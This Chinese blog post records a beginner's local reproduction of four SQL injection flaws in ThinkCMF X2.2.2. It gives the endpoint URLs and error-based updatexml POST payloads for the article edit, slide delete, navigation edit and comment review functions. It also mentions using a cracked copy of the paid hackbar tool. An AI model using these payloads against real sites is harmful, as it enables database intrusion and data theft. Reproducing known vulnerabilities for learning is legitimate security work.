美文网首页
ThinkCMF X2.2.2多处SQL注入漏洞复现

ThinkCMF X2.2.2多处SQL注入漏洞复现

作者: 有时右逝 | 来源:发表于2019-07-21 21:47 被阅读0次

前言

对网络安全恋恋不忘,于是周末又折腾了一遍。作为初学者,挖洞是不敢想的,只能找别人写过的漏洞复现下。特此记录。

漏洞说明

ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,其中X系列基于ThinkPHP 3.2.3开发,最后更新到2.2.2版本。

存在多个漏洞。这里复现了全部。

工具

hackbar
谷歌浏览器
火狐浏览器
xdebug

复现过程

  • 构建环境。
    下载地址如下:
    https://github.com/thinkcmf/cmfx/releases
    安装后如下图。

    image.png
  • 安装hackbar
    这里最主要的工具是它。该工具最新版需要收费。建议安装低版本或者使用破解的。

这里我选择了破解。

破解思路:


image.png
  • 漏洞1
http://127.0.0.1/cmfx/index.php?g=portal&m=article&a=edit_post

POST: post[id][0]=bind&post[id][1]=2 and updatexml(1, concat(0x7e,user(),0x7e),1)-- -


前台文章编辑处存在漏洞。构造下面的请求即可。

image.png
  • 漏洞2

后台管理那里,幻灯片的删除存在漏洞。

http://127.0.0.1/cmfx/index.php?g=Admin&m=slide&a=delete

POST: ids[]=1&ids[]=0 and updatexml(1, concat(0x7e,user(),0x7e),1)
image.png
  • 漏洞3
    导航编辑
http://127.0.0.1/cmfx/index.php?g=Admin&m=nav&a=edit_post

POST: parentid=1 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
image.png
  • 漏洞4
    评论审核那里
http://127.0.0.1/cmfx/index.php?g=Comment&m=commentadmin&a=check&check=1

POST:  ids[]=1&ids[]=2 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
image.png
  • 相关文章

https://blog.csdn.net/weixin_33924770/article/details/86031193

相关文章

网友评论

      本文标题:ThinkCMF X2.2.2多处SQL注入漏洞复现

      本文链接:https://www.haomeiwen.com/subject/uinvlctx.html